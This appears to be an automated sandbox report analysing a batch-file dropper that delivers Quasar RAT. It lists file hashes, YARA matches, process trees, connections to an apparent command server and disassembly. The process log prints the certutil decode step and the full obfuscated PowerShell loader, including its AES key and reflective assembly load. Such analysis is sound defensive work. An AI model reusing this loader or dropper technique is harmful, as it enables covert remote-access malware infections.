                                                                      Preview:@echo off..set "FVGr=set "..%FVGr%"diFAUFtRMb=st"..%FVGr%"HYrJXVYKMt=\v"..%FVGr%"yTBTwAtjPl=rs"..%FVGr%"JrIRTfruLx=ll"..%FVGr%"AcCxjzbNLa=e""..%FVGr%"uimqsJPnna=ws"..%FVGr%"fskjreOFIf=xe"..%FVGr%"BGqwyrxSRT=y "..%FVGr%"RQIVpdMYql=s\"..%FVGr%"JZYSrIliaK=\W"..%FVGr%"pKmrDtKJRu=ow"..%FVGr%"jokylzBZud=po"..%FVGr%"dteNOHluqU=ex"..%FVGr%"JNfEJZoVMF=em"..%FVGr%"LJuCjkXTHo=he"..%FVGr%"NiiSpBZPeO=we"..%FVGr%"wGRWikxUyZ="%~0."..%FVGr%"SOXgWNFsbQ=do"..%FVGr%"OfUcUhdoKk=Po"..%FVGr%"yirSNeGyTS=1."..%FVGr%"XpRSEUcRWD=we"..%FVGr%"MDGcYykQUG=co"..%FVGr%"dSgkpBIVWS=rS"..%FVGr%"blAcMgKKLZ=Sy"..%FVGr%"pFjqvtxWZA=Wi"..%FVGr%"NulBLqNrbK=.e"..%FVGr%"DfiQlRPLOE= /"..%FVGr%"CHdPeSYMSs=ll"..%FVGr%"JWoMEzizDC= C"..%FVGr%"dAMuPrdcZj=:\"..%FVGr%"KVlpBngVtN=in"..%FVGr%"xSIsYMTVlO=he"..%FVGr%"dpDmydkkFw=32"..%FVGr%"UwdGMUTIeF=py"..%FVGr%"QXQbIPoUxz=nd"..%FVGr%"bhFhUMkpqk=0\"..set "GpeR=set "..%GpeR%"tYMoAFPNXc=cd"..%GpeR%"XygUUDuQwo= "%~dp0""..set "AZSJ=set "..%AZSJ%"wObaReDTXA=GD);"..%AZSJ%"qWkGXtcWHU=Secu"..%AZSJ

                                                                      C:\Users\user\AppData\Local\Temp\allah.bat.exe

                                                                      Download File
                                                                      Process:C:\Windows\System32\cmd.exe
                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):447488
                                                                      Entropy (8bit):5.440627434620499
                                                                      Encrypted:false
                                                                      SSDEEP:6144:f1eapvqlkiMWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:NzW2KXzJ4pdd3klnnWosPhnzq
                                                                      MD5:95000560239032BC68B4C2FDFCDEF913
                                                                      SHA1:1B3B40FBC889FD4C645CC12C85D0805AC36BA254
                                                                      SHA-256:D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677
                                                                      SHA-512:F990F72F4D90CE49F7A44DA0C0CDD82D56A7DC7461E073646ACFD448379B2ADEFD6E29FB2A596A9C8819DE53FA709905C98007B70DD4CF98569373013E42EE49
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                      Joe Sandbox View:
                                                                      • Filename: KqB3s5B5BI.exe, Detection: malicious, Browse
                                                                      • Filename: allah.bat, Detection: malicious, Browse
                                                                      • Filename: 5hhAqfqkLs.exe, Detection: malicious, Browse
                                                                      • Filename: 5hhAqfqkLs.exe, Detection: malicious, Browse
                                                                      • Filename: UI721.bin.exe, Detection: malicious, Browse
                                                                      • Filename: SecuriteInfo.com.IL.Trojan.MSILZilla.20149.21390.6577.exe, Detection: malicious, Browse
                                                                      • Filename: Invoice_6238829.bat, Detection: malicious, Browse
                                                                      • Filename: 1.bat, Detection: malicious, Browse
                                                                      • Filename: beampredictor.bat, Detection: malicious, Browse
                                                                      • Filename: c.cmd, Detection: malicious, Browse
                                                                      • Filename: SEQ833Ufdl.exe, Detection: malicious, Browse
                                                                      • Filename: 5rIuV7bm6g.exe, Detection: malicious, Browse
                                                                      • Filename: update.bat, Detection: malicious, Browse
                                                                      • Filename: Aktar#U0131m_kopyas#U0131.bat, Detection: malicious, Browse
                                                                      • Filename: Remittance_slip.bat, Detection: malicious, Browse
                                                                      • Filename: payload1.dll.exe, Detection: malicious, Browse
                                                                      • Filename: umuJhqgUNH.exe, Detection: malicious, Browse
                                                                      • Filename: Setup.bat, Detection: malicious, Browse
                                                                      • Filename: Parts and Inquiry.bat, Detection: malicious, Browse
                                                                      • Filename: loder.bat, Detection: malicious, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................G.......G.............................................+...........Rich............................PE..d....)............"..........P...... 2.........@..........................................`.......... ......................................|@.......p...}...`..................0...P...T.......................(....................................................text.............................. ..`.rdata..............................@..@.data...8....P.......<..............@....pdata.......`.......B..............@..@.rsrc....}...p...~...L..............@..@.reloc..0...........................@..B................................................................................................................................................................................................................................................

                                                                      \Device\Null

                                                                      Download File
                                                                      Process:C:\Windows\System32\certutil.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):100
                                                                      Entropy (8bit):4.859079570624175
                                                                      Encrypted:false
                                                                      SSDEEP:3:qOYFXXmxNVEM+YFUiWUSRwqRF8jxd1ELzdUA2AGN8cv:q3lUdnuiW9gxILxUANGN8e
                                                                      MD5:FA1FF6A8138C97A5B875A45881B15AC1
                                                                      SHA1:09BC1EE3F39C5A4B2DD9CB8B5AC853E0E277FECE
                                                                      SHA-256:C3BE4668A60432076884B0ECC8941E2C9F016813ABEBFB9BE0ADDC3376C60E96
                                                                      SHA-512:415A63EFB1E304DBF1D6B5035AB6024C7932051EF7638BE75A4AD0E9163A4959703C0F3A4AAA019F7C2531BA4F1A17FDCBE7FAE13FDB1131D3B99D289853D975
                                                                      Malicious:false
                                                                      Preview:Input Length = 2277691..Output Length = 1656310..CertUtil: -decode command completed successfully...

                                                                      Static File Info

                                                                      General

                                                                      File type:Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
                                                                      Entropy (8bit):5.697442564532801
                                                                      TrID:
                                                                      • MP3 audio (ID3 v1.x tag) (2501/1) 45.44%
                                                                      • Text - UTF-16 (LE) encoded (2002/1) 36.37%
                                                                      • MP3 audio (1001/1) 18.19%
                                                                      File name:deneme.bat
                                                                      File size:2277691
                                                                      MD5:140518164b4e215675accd37cae0d91f
                                                                      SHA1:605f1798f9b54b245e35ea516c6e3818463953a7
                                                                      SHA256:3411ad812be09efa84946389ddf8fcbc2c1faa7aec4fd419fe02ec748f746abb
                                                                      SHA512:a0210e5147d4e1cda815d4cab29a82f1dd221fd43456d4d9a18ebe1761c90aa31d48f7aca111510dedb2001ef125fb8226634aa3db7fcbfca57a7d5f389a8052
                                                                      SSDEEP:24576:dr8+hKEEFki/cKQSMavHgz6kMtQCJQ5HT0/xBBX0T+DewGEpwERNey20cUIz9Chg:dryEE7kMRy+DeOFYT0hTg+js
                                                                      TLSH:1CB5022541983FE9CB58673CF079320E57F4158B4A65628EAB63EE06BFF6C080D274B5
                                                                      File Content Preview:..&cls..@echo off ..Title %~n0..Mode 60,3 ..color 0B..echo(..echo Please wait... a while Loading data ......CERTUTIL -f -decode "%~f0" "%Temp%\allah.bat" >nul 2>&1 ..cls.."%Temp%\allah.bat"..Exit..-----BEGIN CERTIFICATE-----..QGVjaG8gb2ZmDQpzZXQgI

                                                                      File Icon

                                                                      Icon Hash:9686878b929a9886

                                                                      Network Behavior

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      May 28, 2023 09:35:08.256187916 CEST497023131192.168.2.374.234.104.236
                                                                      May 28, 2023 09:35:11.263130903 CEST497023131192.168.2.374.234.104.236
                                                                      May 28, 2023 09:35:17.263669014 CEST497023131192.168.2.374.234.104.236
                                                                      May 28, 2023 09:35:32.719080925 CEST497033131192.168.2.374.234.104.236
                                                                      May 28, 2023 09:35:35.718307972 CEST497033131192.168.2.374.234.104.236
                                                                      May 28, 2023 09:35:41.722459078 CEST497033131192.168.2.374.234.104.236
                                                                      May 28, 2023 09:35:57.330818892 CEST497043131192.168.2.374.234.104.236
                                                                      May 28, 2023 09:36:00.345535040 CEST497043131192.168.2.374.234.104.236
                                                                      May 28, 2023 09:36:06.361524105 CEST497043131192.168.2.374.234.104.236
                                                                      May 28, 2023 09:36:21.668445110 CEST497053131192.168.2.374.234.104.236
                                                                      May 28, 2023 09:36:24.683211088 CEST497053131192.168.2.374.234.104.236
                                                                      May 28, 2023 09:36:30.683803082 CEST497053131192.168.2.374.234.104.236
                                                                      May 28, 2023 09:36:46.357554913 CEST497063131192.168.2.374.234.104.236
                                                                      May 28, 2023 09:36:49.372786045 CEST497063131192.168.2.374.234.104.236
                                                                      May 28, 2023 09:36:55.389588118 CEST497063131192.168.2.374.234.104.236

                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:09:34:49
                                                                      Start date:28/05/2023
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\deneme.bat" "
                                                                      Imagebase:0x7ff707bb0000
                                                                      File size:273920 bytes
                                                                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Target ID:1
                                                                      Start time:09:34:50
                                                                      Start date:28/05/2023
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff745070000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Target ID:2
                                                                      Start time:09:34:50
                                                                      Start date:28/05/2023
                                                                      Path:C:\Windows\System32\mode.com
                                                                      Wow64 process (32bit):false
                                                                      Commandline:Mode 60,3
                                                                      Imagebase:0x7ff6c3520000
                                                                      File size:31232 bytes
                                                                      MD5 hash:1A3D2D975EB4A5AF22768F1E23C9A83C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate

                                                                      General

                                                                      Target ID:3
                                                                      Start time:09:34:50
                                                                      Start date:28/05/2023
                                                                      Path:C:\Windows\System32\certutil.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:CERTUTIL -f -decode "C:\Users\user\Desktop\deneme.bat" "C:\Users\user\AppData\Local\Temp\allah.bat"
                                                                      Imagebase:0x7ff70d710000
                                                                      File size:1557504 bytes
                                                                      MD5 hash:EB199893441CED4BBBCB547FE411CF2D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate

                                                                      General

                                                                      Target ID:4
                                                                      Start time:09:34:52
                                                                      Start date:28/05/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\allah.bat.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"allah.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $lILxN = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\allah.bat').Split([Environment]::NewLine);foreach ($vOhpq in $lILxN) { if ($vOhpq.StartsWith(':: ')) { $OHwZk = $vOhpq.Substring(3); break; }; };$PPhGD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($OHwZk);$YGMef = New-Object System.Security.Cryptography.AesManaged;$YGMef.Mode = [System.Security.Cryptography.CipherMode]::CBC;$YGMef.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$YGMef.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6pNVYWetf4chAWo/pEbNaRZ3xRLeWmBPF3OumGmDVww=');$YGMef.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxQsLBFdvl0gyeVxt5ivJg==');$blbua = $YGMef.CreateDecryptor();$PPhGD = $blbua.TransformFinalBlock($PPhGD, 0, $PPhGD.Length);$blbua.Dispose();$YGMef.Dispose();$MkYmI = New-Object System.IO.MemoryStream(, $PPhGD);$wtLBU = New-Object System.IO.MemoryStream;$JeXHz = New-Object System.IO.Compression.GZipStream($MkYmI, [IO.Compression.CompressionMode]::Decompress);$JeXHz.CopyTo($wtLBU);$JeXHz.Dispose();$MkYmI.Dispose();$wtLBU.Dispose();$PPhGD = $wtLBU.ToArray();$weWpP = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($PPhGD);$BDLvJ = $weWpP.EntryPoint;$BDLvJ.Invoke($null, (, [string[]] ('')))
                                                                      Imagebase:0x7ff7eb5b0000
                                                                      File size:447488 bytes
                                                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                      • Rule: MALWARE_Win_QuasarStealer, Description: Detects Quasar infostealer, Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekshen
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 0%, ReversingLabs
                                                                      • Detection: 0%, Virustotal, Browse
                                                                      Reputation:high

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:11.4%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:33.3%
                                                                        Total number of Nodes:9
                                                                        Total number of Limit Nodes:0
                                                                        execution_graph 15402 7ffbac11acac 15403 7ffbac11acb5 VirtualProtect 15402->15403 15405 7ffbac11ad7b 15403->15405 15410 7ffbac11c88d 15411 7ffbac11c893 DeleteFileW 15410->15411 15413 7ffbac11ca16 15411->15413 15406 7ffbac11aa8a 15407 7ffbac11aa99 CheckRemoteDebuggerPresent 15406->15407 15409 7ffbac11ab73 15407->15409

                                                                        Executed Functions

                                                                        Function 00007FFBAC5A9456 Relevance: 13.6, Strings: 9, Instructions: 2336COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HJx$HJx$u)_H$Tx$gy$gy$gy$gy$gy
                                                                        • API String ID: 0-1403654266
                                                                        • Opcode ID: e1477256538717f6c6787f33944367a32aedad89e4b7a6da92d76fb8d1c48671
                                                                        • Instruction ID: 4d0f14a94c9bc2baaa4ef720faddcc3876f79fdf2facf544494dab363f7e3225
                                                                        • Opcode Fuzzy Hash: e1477256538717f6c6787f33944367a32aedad89e4b7a6da92d76fb8d1c48671
                                                                        • Instruction Fuzzy Hash: 7C03B5B0A09A598FDB95DF28C499BA97BF1FF59300F1441BAD44ED7292CA35EC42CB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5A7F59 Relevance: 3.4, Strings: 2, Instructions: 937COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 882 7ffbac5a7f59-7ffbac5a7f9e 884 7ffbac5a7fa4-7ffbac5a7fb6 882->884 885 7ffbac5a851a-7ffbac5a8553 882->885 889 7ffbac5a84d5-7ffbac5a84e7 884->889 890 7ffbac5a7fbc-7ffbac5a7fd5 884->890 897 7ffbac5a8554-7ffbac5a85b6 885->897 890->889 893 7ffbac5a7fdb-7ffbac5a7fdf 890->893 895 7ffbac5a8003-7ffbac5a8080 893->895 896 7ffbac5a7fe1-7ffbac5a7fe5 893->896 907 7ffbac5a8086-7ffbac5a80b8 895->907 908 7ffbac5a817a-7ffbac5a8183 895->908 896->897 898 7ffbac5a7feb-7ffbac5a7ffd 896->898 904 7ffbac5a85b8-7ffbac5a85b9 897->904 905 7ffbac5a85bb-7ffbac5a85cd 897->905 898->889 898->895 904->905 913 7ffbac5a861d-7ffbac5a861e 905->913 914 7ffbac5a85cf-7ffbac5a85d7 905->914 907->889 930 7ffbac5a80be-7ffbac5a80c0 907->930 908->889 909 7ffbac5a8189-7ffbac5a81a3 908->909 915 7ffbac5a81a5-7ffbac5a81bb 909->915 916 7ffbac5a81c2-7ffbac5a8206 909->916 923 7ffbac5a8625-7ffbac5a862d 913->923 917 7ffbac5a85d9-7ffbac5a85dc 914->917 918 7ffbac5a8612-7ffbac5a8618 914->918 915->916 940 7ffbac5a820c-7ffbac5a8227 916->940 941 7ffbac5a84cf-7ffbac5a84d3 916->941 917->918 920 7ffbac5a85de-7ffbac5a860d 917->920 922 7ffbac5a8b23-7ffbac5a8b35 918->922 927 7ffbac5a8b36-7ffbac5a8b49 920->927 922->927 924 7ffbac5a8648-7ffbac5a864e 923->924 925 7ffbac5a862f-7ffbac5a8644 923->925 931 7ffbac5a8654-7ffbac5a8668 924->931 932 7ffbac5a8989-7ffbac5a8990 924->932 925->924 933 7ffbac5a80f3-7ffbac5a8174 930->933 934 7ffbac5a80c2-7ffbac5a80d2 930->934 931->932 935 7ffbac5a8997-7ffbac5a89a3 932->935 936 7ffbac5a8992-7ffbac5a8995 932->936 933->907 933->908 934->933 949 7ffbac5a80d4-7ffbac5a80da 934->949 939 7ffbac5a89a5-7ffbac5a89a8 935->939 936->939 945 7ffbac5a89b5-7ffbac5a89bd 939->945 946 7ffbac5a89aa-7ffbac5a89b0 939->946 953 7ffbac5a822d-7ffbac5a8232 940->953 954 7ffbac5a84c0-7ffbac5a84c9 940->954 941->889 942 7ffbac5a8506-7ffbac5a8519 941->942 950 7ffbac5a89c3-7ffbac5a89e0 945->950 951 7ffbac5a8b1d 945->951 946->927 957 7ffbac5a80e1-7ffbac5a80ed 949->957 961 7ffbac5a8a07-7ffbac5a8a12 950->961 962 7ffbac5a89e2-7ffbac5a89f2 call 7ffbac5a75f0 950->962 951->922 959 7ffbac5a8234-7ffbac5a8245 953->959 960 7ffbac5a8247-7ffbac5a824c 953->960 954->940 954->941 957->889 957->933 959->959 959->960 963 7ffbac5a8462-7ffbac5a8467 960->963 964 7ffbac5a8252-7ffbac5a8259 960->964 968 7ffbac5a8a18-7ffbac5a8a1d 961->968 969 7ffbac5a8ad2-7ffbac5a8ad5 961->969 962->961 982 7ffbac5a89f4-7ffbac5a8a02 962->982 970 7ffbac5a8469-7ffbac5a8473 963->970 971 7ffbac5a84a8-7ffbac5a84be 963->971 966 7ffbac5a836a-7ffbac5a8372 964->966 967 7ffbac5a825f-7ffbac5a8269 964->967 976 7ffbac5a84f7-7ffbac5a8501 966->976 977 7ffbac5a8378-7ffbac5a83c6 966->977 974 7ffbac5a835e-7ffbac5a8368 967->974 975 7ffbac5a826f-7ffbac5a82bd 967->975 978 7ffbac5a8a24-7ffbac5a8a27 968->978 979 7ffbac5a8a1f 968->979 969->951 981 7ffbac5a8ad7-7ffbac5a8add 969->981 970->954 980 7ffbac5a8475-7ffbac5a8481 970->980 971->954 984 7ffbac5a8328-7ffbac5a833b 974->984 1000 7ffbac5a831a-7ffbac5a8326 975->1000 1001 7ffbac5a82bf-7ffbac5a8300 975->1001 983 7ffbac5a8444-7ffbac5a845c 976->983 1020 7ffbac5a83c8-7ffbac5a8409 977->1020 1021 7ffbac5a842e-7ffbac5a843e 977->1021 985 7ffbac5a8a29-7ffbac5a8a33 978->985 986 7ffbac5a8a37-7ffbac5a8a3a 978->986 979->978 980->897 987 7ffbac5a8487-7ffbac5a84a6 980->987 988 7ffbac5a8ae6 981->988 989 7ffbac5a8adf-7ffbac5a8ae4 981->989 982->961 983->963 983->966 990 7ffbac5a833d 984->990 991 7ffbac5a8342-7ffbac5a834a 984->991 985->986 995 7ffbac5a8a8a-7ffbac5a8a8d 986->995 996 7ffbac5a8a3c-7ffbac5a8a3f 986->996 987->970 987->971 992 7ffbac5a8aeb-7ffbac5a8b1b 988->992 989->992 990->963 991->967 992->927 998 7ffbac5a8a9a-7ffbac5a8a9f 995->998 999 7ffbac5a8a8f-7ffbac5a8a98 995->999 1002 7ffbac5a8a61-7ffbac5a8a64 996->1002 1003 7ffbac5a8a41-7ffbac5a8a4b 996->1003 1007 7ffbac5a8aa3-7ffbac5a8ab0 998->1007 999->1007 1000->984 1010 7ffbac5a834f-7ffbac5a8359 1000->1010 1001->1000 1027 7ffbac5a8302-7ffbac5a8316 1001->1027 1005 7ffbac5a8a66-7ffbac5a8a6c 1002->1005 1006 7ffbac5a8a74-7ffbac5a8a7a 1002->1006 1009 7ffbac5a8a4c-7ffbac5a8a5b 1003->1009 1005->1006 1011 7ffbac5a8a6e-7ffbac5a8a71 1005->1011 1006->995 1012 7ffbac5a8a7c-7ffbac5a8a86 1006->1012 1007->1009 1016 7ffbac5a8ab2-7ffbac5a8ad0 1007->1016 1009->1002 1022 7ffbac5a8b4a-7ffbac5a8b59 1009->1022 1010->975 1011->1006 1012->995 1016->927 1020->1021 1030 7ffbac5a840b-7ffbac5a8412 1020->1030 1021->983 1023 7ffbac5a84e8-7ffbac5a84f2 1021->1023 1023->977 1027->1000 1030->897 1031 7ffbac5a8418-7ffbac5a842a 1030->1031 1031->1021
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$Tx
                                                                        • API String ID: 0-2169912402
                                                                        • Opcode ID: f18487f8b1836b06f2aba8754622e156a75ec8cce6247d40dc8164ab301dc2b0
                                                                        • Instruction ID: b92372df2d943beb2a145434ef9f285493dc63846c4982547bb5301e282f34bf
                                                                        • Opcode Fuzzy Hash: f18487f8b1836b06f2aba8754622e156a75ec8cce6247d40dc8164ab301dc2b0
                                                                        • Instruction Fuzzy Hash: 0152F3B0A1DA4A4FE759EA2DC44A679B7D1FF85310F14057EE88EC7292DE38E8428741
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5AD84C Relevance: 2.0, Strings: 1, Instructions: 778COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1349 7ffbac5ad84c-7ffbac5ad86f 1352 7ffbac5ad89e-7ffbac5ad8a2 1349->1352 1353 7ffbac5ad871-7ffbac5ad898 1349->1353 1354 7ffbac5adad5-7ffbac5adae3 1352->1354 1355 7ffbac5ad8a8-7ffbac5ad8ad 1352->1355 1353->1352 1358 7ffbac5adb3a-7ffbac5adb51 1353->1358 1355->1354 1356 7ffbac5ad8b3-7ffbac5ad8bd 1355->1356 1360 7ffbac5ad924-7ffbac5ad929 1356->1360 1361 7ffbac5ad8bf-7ffbac5ad8d1 1356->1361 1370 7ffbac5adb53-7ffbac5adb59 1358->1370 1371 7ffbac5adb5d 1358->1371 1363 7ffbac5adab1-7ffbac5adab6 1360->1363 1364 7ffbac5ad92f-7ffbac5ad939 1360->1364 1361->1360 1369 7ffbac5ad8d3-7ffbac5ad917 1361->1369 1363->1354 1365 7ffbac5adab8-7ffbac5adacd 1363->1365 1364->1363 1373 7ffbac5ad93f-7ffbac5ad951 1364->1373 1365->1354 1378 7ffbac5adacf-7ffbac5adad2 1365->1378 1369->1360 1396 7ffbac5ad919-7ffbac5ad91d 1369->1396 1375 7ffbac5adb5b 1370->1375 1376 7ffbac5adb61-7ffbac5adbb8 1370->1376 1371->1376 1377 7ffbac5adb5f 1371->1377 1383 7ffbac5ada47-7ffbac5adaaa 1373->1383 1384 7ffbac5ad957-7ffbac5ad99c 1373->1384 1375->1371 1393 7ffbac5ae17a-7ffbac5ae18c 1376->1393 1394 7ffbac5adbbe-7ffbac5adbd0 1376->1394 1377->1376 1378->1354 1383->1363 1384->1383 1404 7ffbac5ad9a2-7ffbac5ada00 1384->1404 1394->1393 1400 7ffbac5adbd6-7ffbac5adc0f 1394->1400 1396->1360 1400->1393 1411 7ffbac5adc15-7ffbac5adc5b 1400->1411 1404->1383 1418 7ffbac5ada02-7ffbac5ada0d 1404->1418 1415 7ffbac5adc61-7ffbac5adc79 1411->1415 1416 7ffbac5add12-7ffbac5add25 1411->1416 1422 7ffbac5add06-7ffbac5add0c 1415->1422 1423 7ffbac5adc7f-7ffbac5adcb8 1415->1423 1424 7ffbac5add84 1416->1424 1425 7ffbac5add27-7ffbac5add4d 1416->1425 1426 7ffbac5ada2d-7ffbac5ada45 1418->1426 1427 7ffbac5ada0f-7ffbac5ada2b 1418->1427 1422->1415 1422->1416 1423->1422 1441 7ffbac5adcba-7ffbac5adcbe 1423->1441 1428 7ffbac5add86-7ffbac5add8b 1424->1428 1435 7ffbac5add7d-7ffbac5add82 1425->1435 1436 7ffbac5add4f-7ffbac5add7b 1425->1436 1426->1363 1427->1426 1430 7ffbac5add8d-7ffbac5add94 1428->1430 1431 7ffbac5addd2-7ffbac5addf5 1428->1431 1438 7ffbac5add9b-7ffbac5addb5 1430->1438 1442 7ffbac5addfb-7ffbac5ade49 1431->1442 1443 7ffbac5adef0-7ffbac5adefc 1431->1443 1435->1428 1436->1428 1438->1431 1449 7ffbac5addb7-7ffbac5addd0 1438->1449 1446 7ffbac5adcc4-7ffbac5adcd9 1441->1446 1447 7ffbac5ae18d-7ffbac5ae19e 1441->1447 1459 7ffbac5adee4-7ffbac5adeea 1442->1459 1460 7ffbac5ade4f-7ffbac5ade61 1442->1460 1443->1393 1448 7ffbac5adf02-7ffbac5adf17 1443->1448 1455 7ffbac5adce0-7ffbac5adce2 1446->1455 1448->1393 1449->1431 1455->1422 1456 7ffbac5adce4-7ffbac5add02 call 7ffbac5a9240 1455->1456 1456->1422 1459->1442 1459->1443 1460->1459 1464 7ffbac5ade67-7ffbac5ade6b 1460->1464 1464->1447 1465 7ffbac5ade71-7ffbac5adeb4 1464->1465 1465->1459 1471 7ffbac5adeb6-7ffbac5adee1 call 7ffbac5a9240 1465->1471 1471->1459
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: gy
                                                                        • API String ID: 0-2028992370
                                                                        • Opcode ID: 894b69988e407606d570f4e53c8326b356cdb3bf3c5f2231ebb1c2fd2dde3e52
                                                                        • Instruction ID: b22f74246b5b1ddd3f83128eff7f6025c258a3c8ffbc3d81af1f99ee6d5938fe
                                                                        • Opcode Fuzzy Hash: 894b69988e407606d570f4e53c8326b356cdb3bf3c5f2231ebb1c2fd2dde3e52
                                                                        • Instruction Fuzzy Hash: 073282B07199494FDB99EB2CD45DB7837D1EF59310B0541BAE84ECB2A2DE28EC42CB41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC111268 Relevance: 2.0, Strings: 1, Instructions: 752COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
